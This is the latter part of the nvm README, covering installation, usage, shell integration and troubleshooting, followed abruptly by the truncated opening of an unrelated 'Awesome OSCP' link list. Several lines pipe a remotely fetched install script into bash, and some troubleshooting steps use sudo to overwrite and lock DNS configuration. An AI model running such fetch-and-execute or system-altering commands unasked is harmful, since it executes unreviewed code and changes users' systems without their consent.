https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.4/install.sh | bash args: creates: "{{ ansible_env.HOME }}/.nvm/nvm.sh" ``` ### Verify Installation To verify that nvm has been installed, do: ```sh command -v nvm ``` which should output `nvm` if the installation was successful. Please note that `which nvm` will not work, since `nvm` is a sourced shell function, not an executable binary. **Note:** On Linux, after running the install script, if you get `nvm: command not found` or see no feedback from your terminal after you type `command -v nvm`, simply close your current terminal, open a new terminal, and try verifying again. ### Important Notes If you're running a system without prepackaged binary available, which means you're going to install nodejs or io.js from its source code, you need to make sure your system has a C++ compiler. For OS X, Xcode will work, for Debian/Ubuntu based GNU/Linux, the `build-essential` and `libssl-dev` packages work. **Note:** `nvm` also support Windows in some cases. It should work through WSL (Windows Subsystem for Linux) depending on the version of WSL. It should also work with [GitBash](https://gitforwindows.org/) (MSYS) or [Cygwin](https://cygwin.com). Otherwise, for Windows, a few alternatives exist, which are neither supported nor developed by us: - [nvm-windows](https://github.com/coreybutler/nvm-windows) - [nodist](https://github.com/marcelklehr/nodist) - [nvs](https://github.com/jasongin/nvs) **Note:** `nvm` does not support [Fish] either (see [#303](https://github.com/nvm-sh/nvm/issues/303)). Alternatives exist, which are neither supported nor developed by us: - [bass](https://github.com/edc/bass) allows you to use utilities written for Bash in fish shell - [fast-nvm-fish](https://github.com/brigand/fast-nvm-fish) only works with version numbers (not aliases) but doesn't significantly slow your shell startup - [plugin-nvm](https://github.com/derekstavis/plugin-nvm) plugin for [Oh My Fish](https://github.com/oh-my-fish/oh-my-fish), which makes nvm and its completions available in fish shell - [fnm](https://github.com/fisherman/fnm) - [fisherman](https://github.com/fisherman/fisherman)-based version manager for fish - [fish-nvm](https://github.com/FabioAntunes/fish-nvm) - Wrapper around nvm for fish, delays sourcing nvm until it's actually used. **Note:** We still have some problems with FreeBSD, because there is no official pre-built binary for FreeBSD, and building from source may need [patches](https://www.freshports.org/www/node/files/patch-deps_v8_src_base_platform_platform-posix.cc); see the issue ticket: - [[#900] [Bug] nodejs on FreeBSD may need to be patched](https://github.com/nvm-sh/nvm/issues/900) - [nodejs/node#3716](https://github.com/nodejs/node/issues/3716) **Note:** On OS X, if you do not have Xcode installed and you do not wish to download the ~4.3GB file, you can install the `Command Line Tools`. You can check out this blog post on how to just that: - [How to Install Command Line Tools in OS X Mavericks & Yosemite (Without Xcode)](https://osxdaily.com/2014/02/12/install-command-line-tools-mac-os-x/) **Note:** On OS X, if you have/had a "system" node installed and want to install modules globally, keep in mind that: - When using `nvm` you do not need `sudo` to globally install a module with `npm -g`, so instead of doing `sudo npm install -g grunt`, do instead `npm install -g grunt` - If you have an `~/.npmrc` file, make sure it does not contain any `prefix` settings (which is not compatible with `nvm`) - You can (but should not?) keep your previous "system" node install, but `nvm` will only be available to your user account (the one used to install nvm). This might cause version mismatches, as other users will be using `/usr/local/lib/node_modules/*` VS your user account using `~/.nvm/versions/node/vX.X.X/lib/node_modules/*` Homebrew installation is not supported. If you have issues with homebrew-installed `nvm`, please `brew uninstall` it, and install it using the instructions below, before filing an issue. **Note:** If you're using `zsh` you can easily install `nvm` as a zsh plugin. Install [`zsh-nvm`](https://github.com/lukechilds/zsh-nvm) and run `nvm upgrade` to upgrade. **Note:** Git versions before v1.7 may face a problem of cloning `nvm` source from GitHub via https protocol, and there is also different behavior of git before v1.6, and git prior to [v1.17.10](https://github.com/git/git/commit/5a7d5b683f869d3e3884a89775241afa515da9e7) can not clone tags, so the minimum required git version is v1.7.10. If you are interested in the problem we mentioned here, please refer to GitHub's [HTTPS cloning errors](https://help.github.com/articles/https-cloning-errors/) article. ### Git Install If you have `git` installed (requires git v1.7.10+): 1. clone this repo in the root of your user profile - `cd ~/` from anywhere then `git clone https://github.com/nvm-sh/nvm.git .nvm` 1. `cd ~/.nvm` and check out the latest version with `git checkout v0.39.4` 1. activate `nvm` by sourcing it from your shell: `. ./nvm.sh` Now add these lines to your `~/.bashrc`, `~/.profile`, or `~/.zshrc` file to have it automatically sourced upon login: (you may have to add to more than one of the above files) ```sh export NVM_DIR="$HOME/.nvm" [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm [ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion ``` ### Manual Install For a fully manual install, execute the following lines to first clone the `nvm` repository into `$HOME/.nvm`, and then load `nvm`: ```sh export NVM_DIR="$HOME/.nvm" && ( git clone https://github.com/nvm-sh/nvm.git "$NVM_DIR" cd "$NVM_DIR" git checkout `git describe --abbrev=0 --tags --match "v[0-9]*" $(git rev-list --tags --max-count=1)` ) && \. "$NVM_DIR/nvm.sh" ``` Now add these lines to your `~/.bashrc`, `~/.profile`, or `~/.zshrc` file to have it automatically sourced upon login: (you may have to add to more than one of the above files) ```sh export NVM_DIR="$HOME/.nvm" [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm [ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion ``` ### Manual Upgrade For manual upgrade with `git` (requires git v1.7.10+): 1. change to the `$NVM_DIR` 1. pull down the latest changes 1. check out the latest version 1. activate the new version ```sh ( cd "$NVM_DIR" git fetch --tags origin git checkout `git describe --abbrev=0 --tags --match "v[0-9]*" $(git rev-list --tags --max-count=1)` ) && \. "$NVM_DIR/nvm.sh" ``` ## Usage To download, compile, and install the latest release of node, do this: ```sh nvm install node # "node" is an alias for the latest version ``` To install a specific version of node: ```sh nvm install 14.7.0 # or 16.3.0, 12.22.1, etc ``` The first version installed becomes the default. New shells will start with the default version of node (e.g., `nvm alias default`). You can list available versions using `ls-remote`: ```sh nvm ls-remote ``` And then in any new shell just use the installed version: ```sh nvm use node ``` Or you can just run it: ```sh nvm run node --version ``` Or, you can run any arbitrary command in a subshell with the desired version of node: ```sh nvm exec 4.2 node --version ``` You can also get the path to the executable to where it was installed: ```sh nvm which 12.22 ``` In place of a version pointer like "14.7" or "16.3" or "12.22.1", you can use the following special default aliases with `nvm install`, `nvm use`, `nvm run`, `nvm exec`, `nvm which`, etc: - `node`: this installs the latest version of [`node`](https://nodejs.org/en/) - `iojs`: this installs the latest version of [`io.js`](https://iojs.org/en/) - `stable`: this alias is deprecated, and only truly applies to `node` `v0.12` and earlier. Currently, this is an alias for `node`. - `unstable`: this alias points to `node` `v0.11` - the last "unstable" node release, since post-1.0, all node versions are stable. (in SemVer, versions communicate breakage, not stability). ### Long-term Support Node has a [schedule](https://github.com/nodejs/Release#release-schedule) for long-term support (LTS) You can reference LTS versions in aliases and `.nvmrc` files with the notation `lts/*` for the latest LTS, and `lts/argon` for LTS releases from the "argon" line, for example. In addition, the following commands support LTS arguments: - `nvm install --lts` / `nvm install --lts=argon` / `nvm install 'lts/*'` / `nvm install lts/argon` - `nvm uninstall --lts` / `nvm uninstall --lts=argon` / `nvm uninstall 'lts/*'` / `nvm uninstall lts/argon` - `nvm use --lts` / `nvm use --lts=argon` / `nvm use 'lts/*'` / `nvm use lts/argon` - `nvm exec --lts` / `nvm exec --lts=argon` / `nvm exec 'lts/*'` / `nvm exec lts/argon` - `nvm run --lts` / `nvm run --lts=argon` / `nvm run 'lts/*'` / `nvm run lts/argon` - `nvm ls-remote --lts` / `nvm ls-remote --lts=argon` `nvm ls-remote 'lts/*'` / `nvm ls-remote lts/argon` - `nvm version-remote --lts` / `nvm version-remote --lts=argon` / `nvm version-remote 'lts/*'` / `nvm version-remote lts/argon` Any time your local copy of `nvm` connects to https://nodejs.org, it will re-create the appropriate local aliases for all available LTS lines. These aliases (stored under `$NVM_DIR/alias/lts`), are managed by `nvm`, and you should not modify, remove, or create these files - expect your changes to be undone, and expect meddling with these files to cause bugs that will likely not be supported. To get the latest LTS version of node and migrate your existing installed packages, use ```sh nvm install 'lts/*' --reinstall-packages-from=current ``` ### Migrating Global Packages While Installing If you want to install a new version of Node.js and migrate npm packages from a previous version: ```sh nvm install node --reinstall-packages-from=node ``` This will first use "nvm version node" to identify the current version you're migrating packages from. Then it resolves the new version to install from the remote server and installs it. Lastly, it runs "nvm reinstall-packages" to reinstall the npm packages from your prior version of Node to the new one. You can also install and migrate npm packages from specific versions of Node like this: ```sh nvm install 6 --reinstall-packages-from=5 nvm install v4.2 --reinstall-packages-from=iojs ``` Note that reinstalling packages _explicitly does not update the npm version_ — this is to ensure that npm isn't accidentally upgraded to a broken version for the new node version. To update npm at the same time add the `--latest-npm` flag, like this: ```sh nvm install 'lts/*' --reinstall-packages-from=default --latest-npm ``` or, you can at any time run the following command to get the latest supported npm version on the current node version: ```sh nvm install-latest-npm ``` If you've already gotten an error to the effect of "npm does not support Node.js", you'll need to (1) revert to a previous node version (`nvm ls` & `nvm use <your latest _working_ version from the ls>`, (2) delete the newly created node version (`nvm uninstall <your _broken_ version of node from the ls>`), then (3) rerun your `nvm install` with the `--latest-npm` flag. ### Default Global Packages From File While Installing If you have a list of default packages you want installed every time you install a new version, we support that too -- just add the package names, one per line, to the file `$NVM_DIR/default-packages`. You can add anything npm would accept as a package argument on the command line. ```sh # $NVM_DIR/default-packages rimraf [email protected] stevemao/left-pad ``` ### io.js If you want to install [io.js](https://github.com/iojs/io.js/): ```sh nvm install iojs ``` If you want to install a new version of io.js and migrate npm packages from a previous version: ```sh nvm install iojs --reinstall-packages-from=iojs ``` The same guidelines mentioned for migrating npm packages in node are applicable to io.js. ### System Version of Node If you want to use the system-installed version of node, you can use the special default alias "system": ```sh nvm use system nvm run system --version ``` ### Listing Versions If you want to see what versions are installed: ```sh nvm ls ``` If you want to see what versions are available to install: ```sh nvm ls-remote ``` ### Setting Custom Colors You can set five colors that will be used to display version and alias information. These colors replace the default colors. Initial colors are: g b y r e Color codes: r/R = red / bold red g/G = green / bold green b/B = blue / bold blue c/C = cyan / bold cyan m/M = magenta / bold magenta y/Y = yellow / bold yellow k/K = black / bold black e/W = light grey / white ```sh nvm set-colors rgBcm ``` #### Persisting custom colors If you want the custom colors to persist after terminating the shell, export the `NVM_COLORS` variable in your shell profile. For example, if you want to use cyan, magenta, green, bold red and bold yellow, add the following line: ```sh export NVM_COLORS='cmgRY' ``` #### Suppressing colorized output `nvm help (or -h or --help)`, `nvm ls`, `nvm ls-remote` and `nvm alias` usually produce colorized output. You can disable colors with the `--no-colors` option (or by setting the environment variable `TERM=dumb`): ```sh nvm ls --no-colors nvm help --no-colors TERM=dumb nvm ls ``` #### Restoring PATH To restore your PATH, you can deactivate it: ```sh nvm deactivate ``` #### Set default node version To set a default Node version to be used in any new shell, use the alias 'default': ```sh nvm alias default node ``` #### Use a mirror of node binaries To use a mirror of the node binaries, set `$NVM_NODEJS_ORG_MIRROR`: ```sh export NVM_NODEJS_ORG_MIRROR=https://nodejs.org/dist nvm install node NVM_NODEJS_ORG_MIRROR=https://nodejs.org/dist nvm install 4.2 ``` To use a mirror of the io.js binaries, set `$NVM_IOJS_ORG_MIRROR`: ```sh export NVM_IOJS_ORG_MIRROR=https://iojs.org/dist nvm install iojs-v1.0.3 NVM_IOJS_ORG_MIRROR=https://iojs.org/dist nvm install iojs-v1.0.3 ``` `nvm use` will not, by default, create a "current" symlink. Set `$NVM_SYMLINK_CURRENT` to "true" to enable this behavior, which is sometimes useful for IDEs. Note that using `nvm` in multiple shell tabs with this environment variable enabled can cause race conditions. ### .nvmrc You can create a `.nvmrc` file containing a node version number (or any other string that `nvm` understands; see `nvm --help` for details) in the project root directory (or any parent directory). Afterwards, `nvm use`, `nvm install`, `nvm exec`, `nvm run`, and `nvm which` will use the version specified in the `.nvmrc` file if no version is supplied on the command line. For example, to make nvm default to the latest 5.9 release, the latest LTS version, or the latest node version for the current directory: ```sh $ echo "5.9" > .nvmrc $ echo "lts/*" > .nvmrc # to default to the latest LTS version $ echo "node" > .nvmrc # to default to the latest version ``` [NB these examples assume a POSIX-compliant shell version of `echo`. If you use a Windows `cmd` development environment, eg the `.nvmrc` file is used to configure a remote Linux deployment, then keep in mind the `"`s will be copied leading to an invalid file. Remove them.] Then when you run nvm: ```sh $ nvm use Found '/path/to/project/.nvmrc' with version <5.9> Now using node v5.9.1 (npm v3.7.3) ``` `nvm use` et. al. will traverse directory structure upwards from the current directory looking for the `.nvmrc` file. In other words, running `nvm use` et. al. in any subdirectory of a directory with an `.nvmrc` will result in that `.nvmrc` being utilized. The contents of a `.nvmrc` file **must** be the `<version>` (as described by `nvm --help`) followed by a newline. No trailing spaces are allowed, and the trailing newline is required. ### Deeper Shell Integration You can use [`avn`](https://github.com/wbyoung/avn) to deeply integrate into your shell and automatically invoke `nvm` when changing directories. `avn` is **not** supported by the `nvm` maintainers. Please [report issues to the `avn` team](https://github.com/wbyoung/avn/issues/new). You can also use [`nvshim`](https://github.com/iamogbz/nvshim) to shim the `node`, `npm`, and `npx` bins to automatically use the `nvm` config in the current directory. `nvshim` is **not** supported by the `nvm` maintainers. Please [report issues to the `nvshim` team](https://github.com/iamogbz/nvshim/issues/new). If you prefer a lighter-weight solution, the recipes below have been contributed by `nvm` users. They are **not** supported by the `nvm` maintainers. We are, however, accepting pull requests for more examples. #### bash ##### Automatically call `nvm use` Put the following at the end of your `$HOME/.bashrc`: ```bash cdnvm() { command cd "$@" || return $? nvm_path=$(nvm_find_up .nvmrc | tr -d '\n') # If there are no .nvmrc file, use the default nvm version if [[ ! $nvm_path = *[^[:space:]]* ]]; then declare default_version; default_version=$(nvm version default); # If there is no default version, set it to `node` # This will use the latest version on your machine if [[ $default_version == "N/A" ]]; then nvm alias default node; default_version=$(nvm version default); fi # If the current version is not the default version, set it to use the default version if [[ $(nvm current) != "$default_version" ]]; then nvm use default; fi elif [[ -s $nvm_path/.nvmrc && -r $nvm_path/.nvmrc ]]; then declare nvm_version nvm_version=$(<"$nvm_path"/.nvmrc) declare locally_resolved_nvm_version # `nvm ls` will check all locally-available versions # If there are multiple matching versions, take the latest one # Remove the `->` and `*` characters and spaces # `locally_resolved_nvm_version` will be `N/A` if no local versions are found locally_resolved_nvm_version=$(nvm ls --no-colors "$nvm_version" | tail -1 | tr -d '\->*' | tr -d '[:space:]') # If it is not already installed, install it # `nvm install` will implicitly use the newly-installed version if [[ "$locally_resolved_nvm_version" == "N/A" ]]; then nvm install "$nvm_version"; elif [[ $(nvm current) != "$locally_resolved_nvm_version" ]]; then nvm use "$nvm_version"; fi fi } alias cd='cdnvm' cdnvm "$PWD" || exit ``` This alias would search 'up' from your current directory in order to detect a `.nvmrc` file. If it finds it, it will switch to that version; if not, it will use the default version. #### zsh ##### Calling `nvm use` automatically in a directory with a `.nvmrc` file Put this into your `$HOME/.zshrc` to call `nvm use` automatically whenever you enter a directory that contains an `.nvmrc` file with a string telling nvm which node to `use`: ```zsh # place this after nvm initialization! autoload -U add-zsh-hook load-nvmrc() { local nvmrc_path nvmrc_path="$(nvm_find_nvmrc)" if [ -n "$nvmrc_path" ]; then local nvmrc_node_version nvmrc_node_version=$(nvm version "$(cat "${nvmrc_path}")") if [ "$nvmrc_node_version" = "N/A" ]; then nvm install elif [ "$nvmrc_node_version" != "$(nvm version)" ]; then nvm use fi elif [ -n "$(PWD=$OLDPWD nvm_find_nvmrc)" ] && [ "$(nvm version)" != "$(nvm version default)" ]; then echo "Reverting to nvm default version" nvm use default fi } add-zsh-hook chpwd load-nvmrc load-nvmrc ``` #### fish ##### Calling `nvm use` automatically in a directory with a `.nvmrc` file This requires that you have [bass](https://github.com/edc/bass) installed. ```fish # ~/.config/fish/functions/nvm.fish function nvm bass source ~/.nvm/nvm.sh --no-use ';' nvm $argv end # ~/.config/fish/functions/nvm_find_nvmrc.fish function nvm_find_nvmrc bass source ~/.nvm/nvm.sh --no-use ';' nvm_find_nvmrc end # ~/.config/fish/functions/load_nvm.fish function load_nvm --on-variable="PWD" set -l default_node_version (nvm version default) set -l node_version (nvm version) set -l nvmrc_path (nvm_find_nvmrc) if test -n "$nvmrc_path" set -l nvmrc_node_version (nvm version (cat $nvmrc_path)) if test "$nvmrc_node_version" = "N/A" nvm install (cat $nvmrc_path) else if test "$nvmrc_node_version" != "$node_version" nvm use $nvmrc_node_version end else if test "$node_version" != "$default_node_version" echo "Reverting to default Node version" nvm use default end end # ~/.config/fish/config.fish # You must call it on initialization or listening to directory switching won't work load_nvm > /dev/stderr ``` ## Running Tests Tests are written in [Urchin]. Install Urchin (and other dependencies) like so: npm install There are slow tests and fast tests. The slow tests do things like install node and check that the right versions are used. The fast tests fake this to test things like aliases and uninstalling. From the root of the nvm git repository, run the fast tests like this: npm run test/fast Run the slow tests like this: npm run test/slow Run all of the tests like this: npm test Nota bene: Avoid running nvm while the tests are running. ## Environment variables nvm exposes the following environment variables: - `NVM_DIR` - nvm's installation directory. - `NVM_BIN` - where node, npm, and global packages for the active version of node are installed. - `NVM_INC` - node's include file directory (useful for building C/C++ addons for node). - `NVM_CD_FLAGS` - used to maintain compatibility with zsh. - `NVM_RC_VERSION` - version from .nvmrc file if being used. Additionally, nvm modifies `PATH`, and, if present, `MANPATH` and `NODE_PATH` when changing versions. ## Bash Completion To activate, you need to source `bash_completion`: ```sh [[ -r $NVM_DIR/bash_completion ]] && \. $NVM_DIR/bash_completion ``` Put the above sourcing line just below the sourcing line for nvm in your profile (`.bashrc`, `.bash_profile`). ### Usage nvm: > `$ nvm` <kbd>Tab</kbd> ```sh alias deactivate install list-remote reinstall-packages uninstall version cache exec install-latest-npm ls run unload version-remote current help list ls-remote unalias use which ``` nvm alias: > `$ nvm alias` <kbd>Tab</kbd> ```sh default iojs lts/* lts/argon lts/boron lts/carbon lts/dubnium lts/erbium node stable unstable ``` > `$ nvm alias my_alias` <kbd>Tab</kbd> ```sh v10.22.0 v12.18.3 v14.8.0 ``` nvm use: > `$ nvm use` <kbd>Tab</kbd> ``` my_alias default v10.22.0 v12.18.3 v14.8.0 ``` nvm uninstall: > `$ nvm uninstall` <kbd>Tab</kbd> ``` my_alias default v10.22.0 v12.18.3 v14.8.0 ``` ## Compatibility Issues `nvm` will encounter some issues if you have some non-default settings set. (see [#606](https://github.com/creationix/nvm/issues/606)) The following are known to cause issues: Inside `~/.npmrc`: ```sh prefix='some/path' ``` Environment Variables: ```sh $NPM_CONFIG_PREFIX $PREFIX ``` Shell settings: ```sh set -e ``` ## Installing nvm on Alpine Linux In order to provide the best performance (and other optimizations), nvm will download and install pre-compiled binaries for Node (and npm) when you run `nvm install X`. The Node project compiles, tests and hosts/provides these pre-compiled binaries which are built for mainstream/traditional Linux distributions (such as Debian, Ubuntu, CentOS, RedHat et al). Alpine Linux, unlike mainstream/traditional Linux distributions, is based on [BusyBox](https://www.busybox.net/), a very compact (~5MB) Linux distribution. BusyBox (and thus Alpine Linux) uses a different C/C++ stack to most mainstream/traditional Linux distributions - [musl](https://www.musl-libc.org/). This makes binary programs built for such mainstream/traditional incompatible with Alpine Linux, thus we cannot simply `nvm install X` on Alpine Linux and expect the downloaded binary to run correctly - you'll likely see "...does not exist" errors if you try that. There is a `-s` flag for `nvm install` which requests nvm download Node source and compile it locally. If installing nvm on Alpine Linux *is* still what you want or need to do, you should be able to achieve this by running the following from you Alpine Linux shell, depending on which version you are using: ### Alpine Linux 3.13+ ```sh apk add -U curl bash ca-certificates openssl ncurses coreutils python3 make gcc g++ libgcc linux-headers grep util-linux binutils findutils curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.4/install.sh | bash ``` ### Alpine Linux 3.5 - 3.12 ```sh apk add -U curl bash ca-certificates openssl ncurses coreutils python2 make gcc g++ libgcc linux-headers grep util-linux binutils findutils curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.4/install.sh | bash ``` _Note: Alpine 3.5 can only install NodeJS versions up to v6.9.5, Alpine 3.6 can only install versions up to v6.10.3, Alpine 3.7 installs versions up to v8.9.3, Alpine 3.8 installs versions up to v8.14.0, Alpine 3.9 installs versions up to v10.19.0, Alpine 3.10 installs versions up to v10.24.1, Alpine 3.11 installs versions up to v12.22.6, Alpine 3.12 installs versions up to v12.22.12, Alpine 3.13 & 3.14 install versions up to v14.20.0, Alpine 3.15 & 3.16 install versions up to v16.16.0 (**These are all versions on the main branch**). Alpine 3.5 - 3.12 required the package `python2` to build NodeJS, as they are older versions to build. Alpine 3.13+ requires `python3` to successfully build newer NodeJS versions, but you can use `python2` with Alpine 3.13+ if you need to build versions of node supported in Alpine 3.5 - 3.15, you just need to specify what version of NodeJS you need to install in the package install script._ The Node project has some desire but no concrete plans (due to the overheads of building, testing and support) to offer Alpine-compatible binaries. As a potential alternative, @mhart (a Node contributor) has some [Docker images for Alpine Linux with Node and optionally, npm, pre-installed](https://github.com/mhart/alpine-node). <a id="removal"></a> ## Uninstalling / Removal ### Manual Uninstall To remove `nvm` manually, execute the following: ```sh $ rm -rf "$NVM_DIR" ``` Edit `~/.bashrc` (or other shell resource config) and remove the lines below: ```sh export NVM_DIR="$HOME/.nvm" [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm [[ -r $NVM_DIR/bash_completion ]] && \. $NVM_DIR/bash_completion ``` ## Docker For Development Environment To make the development and testing work easier, we have a Dockerfile for development usage, which is based on Ubuntu 18.04 base image, prepared with essential and useful tools for `nvm` development, to build the docker image of the environment, run the docker command at the root of `nvm` repository: ```sh $ docker build -t nvm-dev . ``` This will package your current nvm repository with our pre-defined development environment into a docker image named `nvm-dev`, once it's built with success, validate your image via `docker images`: ```sh $ docker images REPOSITORY TAG IMAGE ID CREATED SIZE nvm-dev latest 9ca4c57a97d8 7 days ago 650 MB ``` If you got no error message, now you can easily involve in: ```sh $ docker run -h nvm-dev -it nvm-dev nvm@nvm-dev:~/.nvm$ ``` Please note that it'll take about 8 minutes to build the image and the image size would be about 650MB, so it's not suitable for production usage. For more information and documentation about docker, please refer to its official website: - https://www.docker.com/ - https://docs.docker.com/ ## Problems - If you try to install a node version and the installation fails, be sure to run `nvm cache clear` to delete cached node downloads, or you might get an error like the following: curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume. - Where's my `sudo node`? Check out [#43](https://github.com/nvm-sh/nvm/issues/43) - After the v0.8.6 release of node, nvm tries to install from binary packages. But in some systems, the official binary packages don't work due to incompatibility of shared libs. In such cases, use `-s` option to force install from source: ```sh nvm install -s 0.8.6 ``` - If setting the `default` alias does not establish the node version in new shells (i.e. `nvm current` yields `system`), ensure that the system's node `PATH` is set before the `nvm.sh` source line in your shell profile (see [#658](https://github.com/nvm-sh/nvm/issues/658)) ## macOS Troubleshooting **nvm node version not found in vim shell** If you set node version to a version other than your system node version `nvm use 6.2.1` and open vim and run `:!node -v` you should see `v6.2.1` if you see your system version `v0.12.7`. You need to run: ```shell sudo chmod ugo-x /usr/libexec/path_helper ``` More on this issue in [dotphiles/dotzsh](https://github.com/dotphiles/dotzsh#mac-os-x). **nvm is not compatible with the npm config "prefix" option** Some solutions for this issue can be found [here](https://github.com/nvm-sh/nvm/issues/1245) There is one more edge case causing this issue, and that's a **mismatch between the `$HOME` path and the user's home directory's actual name**. You have to make sure that the user directory name in `$HOME` and the user directory name you'd see from running `ls /Users/` **are capitalized the same way** ([See this issue](https://github.com/nvm-sh/nvm/issues/2261)). To change the user directory and/or account name follow the instructions [here](https://support.apple.com/en-us/HT201548) [1]: https://github.com/nvm-sh/nvm.git [2]: https://github.com/nvm-sh/nvm/blob/v0.39.4/install.sh [3]: https://app.travis-ci.com/nvm-sh/nvm [4]: https://github.com/nvm-sh/nvm/releases/tag/v0.39.4 [Urchin]: https://git.sdf.org/tlevine/urchin [Fish]: https://fishshell.com **Homebrew makes zsh directories unsecure** ```shell zsh compinit: insecure directories, run compaudit for list. Ignore insecure directories and continue [y] or abort compinit [n]? y ``` Homebrew causes insecure directories like `/usr/local/share/zsh/site-functions` and `/usr/local/share/zsh`. This is **not** an `nvm` problem - it is a homebrew problem. Refer [here](https://github.com/zsh-users/zsh-completions/issues/680) for some solutions related to the issue. **Macs with M1 chip** Experimental support for the M1 architecture was added in node.js v15.3 and full support was added in v16.0. Because of this, if you try to install older versions of node as usual, you will probably experience either compilation errors when installing node or out-of-memory errors while running your code. So, if you want to run a version prior to v16.0 on an M1 Mac, it may be best to compile node targeting the `x86_64` Intel architecture so that Rosetta 2 can translate the `x86_64` processor instructions to ARM-based Apple Silicon instructions. Here's what you will need to do: - Install Rosetta, if you haven't already done so ```sh $ softwareupdate --install-rosetta ``` You might wonder, "how will my M1 Mac know to use Rosetta for a version of node compiled for an Intel chip?". If an executable contains only Intel instructions, macOS will automatically use Rosetta to translate the instructions. - Open a shell that's running using Rosetta ```sh $ arch -x86_64 zsh ``` Note: This same thing can also be accomplished by finding the Terminal or iTerm App in Finder, right clicking, selecting "Get Info", and then checking the box labeled "Open using Rosetta". Note: This terminal session is now running in `zsh`. If `zsh` is not the shell you typically use, `nvm` may not be `source`'d automatically like it probably is for your usual shell through your dotfiles. If that's the case, make sure to source `nvm`. ```sh $ source "${NVM_DIR}/nvm.sh" ``` - Install whatever older version of node you are interested in. Let's use 12.22.1 as an example. This will fetch the node source code and compile it, which will take several minutes. ```sh $ nvm install v12.22.1 --shared-zlib ``` Note: You're probably curious why `--shared-zlib` is included. There's a bug in recent versions of Apple's system `clang` compiler. If one of these broken versions is installed on your system, the above step will likely still succeed even if you didn't include the `--shared-zlib` flag. However, later, when you attempt to `npm install` something using your old version of node.js, you will see `incorrect data check` errors. If you want to avoid the possible hassle of dealing with this, include that flag. For more details, see [this issue](https://github.com/nodejs/node/issues/39313) and [this comment](https://github.com/nodejs/node/issues/39313#issuecomment-902395576) - Exit back to your native shell. ```sh $ exit $ arch arm64 ``` Note: If you selected the box labeled "Open using Rosetta" rather than running the CLI command in the second step, you will see `i386` here. Unless you have another reason to have that box selected, you can deselect it now. - Check to make sure the architecture is correct. `x64` is the abbreviation for `x86_64`, which is what you want to see. ```sh $ node -p process.arch x64 ``` Now you should be able to use node as usual. ## WSL Troubleshooting If you've encountered this error on WSL-2: ```sh curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.4/install.sh | bash % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- 0:00:09 --:--:-- 0curl: (6) Could not resolve host: raw.githubusercontent.com ``` It may be due to your antivirus, VPN, or other reasons. Where you can `ping 8.8.8.8` while you can't `ping google.com` This could simply be solved by running this in your root directory: ```sh sudo rm /etc/resolv.conf sudo bash -c 'echo "nameserver 8.8.8.8" > /etc/resolv.conf' sudo bash -c 'echo "[network]" > /etc/wsl.conf' sudo bash -c 'echo "generateResolvConf = false" >> /etc/wsl.conf' sudo chattr +i /etc/resolv.conf ``` This deletes your `resolv.conf` file thats automatically generated when u run WSL, creates a new file and puts `nameserver 8.8.8.8`, then creates a `wsl.conf` file and adds `[network]` and `generateResolveConf = false` to prevent auto generation of that file. You can check the contents of the file by running: ```sh cat /etc/resolv.conf ``` ## Maintainers Currently, the sole maintainer is [@ljharb](https://github.com/ljharb) - more maintainers are quite welcome, and we hope to add folks to the team over time. [Governance](./GOVERNANCE.md) will be re-evaluated as the project evolves. ## License See [LICENSE.md](./LICENSE.md). ## Copyright notice Copyright [OpenJS Foundation](https://openjsf.org) and `nvm` contributors. All rights reserved. The [OpenJS Foundation](https://openjsf.org) has registered trademarks and uses trademarks. For a list of trademarks of the [OpenJS Foundation](https://openjsf.org), please see our [Trademark Policy](https://trademark-policy.openjsf.org/) and [Trademark List](https://trademark-list.openjsf.org/). Node.js is a trademark of Joyent, Inc. and is used with its permission. Trademarks and logos not indicated on the [list of OpenJS Foundation trademarks](https://trademark-list.openjsf.org) are trademarks™ or registered® trademarks of their respective holders. Use of them does not imply any affiliation with or endorsement by them. [The OpenJS Foundation](https://openjsf.org/) | [Terms of Use](https://terms-of-use.openjsf.org/) | [Privacy Policy](https://privacy-policy.openjsf.org/) | [OpenJS Foundation Bylaws](https://bylaws.openjsf.org/) | [Trademark Policy](https://trademark-policy.openjsf.org/) | [Trademark List](https://trademark-list.openjsf.org/) | [Cookie Policy](https://www.linuxfoundation.org/cookies/)
# Awesome OSCP [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) > A curated list of awesome OSCP resources ## Contents - [Resources](#resources) - [OSCP Reviews and Guides](#oscp-reviews-and-guides) - [Cheatsheets and Scripts](#cheatsheets-and-scripts) - [Topics](#topics) - [Buffer Overflow](#buffer-overflow) - [Privilege Escalation](#privilege-escalation) - [Active Directory](#Active-Directory) - [Other OSCP Resources](#other-oscp-resources) - [Books](#books) - [License](#license) ## Resources ### OSCP Reviews and Guides - [Official OSCP Certification Exam Guide](https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide) - Luke’s Ultimate OSCP Guide ([Part 1](https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440), [Part 2](https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-2-workflow-and-documentation-tips-9dd335204a48), [Part 3](https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-3-practical-hacking-tips-and-tricks-c38486f5fc97)) - [How to prepare for PWK/OSCP, a noob-friendly guide](https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob) - [n3ko1's OSCP Guide](http://www.lucas-bader.com/certification/2015/05/27/oscp-offensive-security-certified-professional) - [Jan's "Path to OSCP" Videos](https://www.youtube.com/playlist?list=PLyPJ3SHNkjIFITR-Lzsc0XSOBS7JUXsOy) - [Offensive Security’s PWB and OSCP - My Experience](http://www.securitysift.com/offsec-pwb-oscp/) (+ some scripts) - [OSCP Lab and 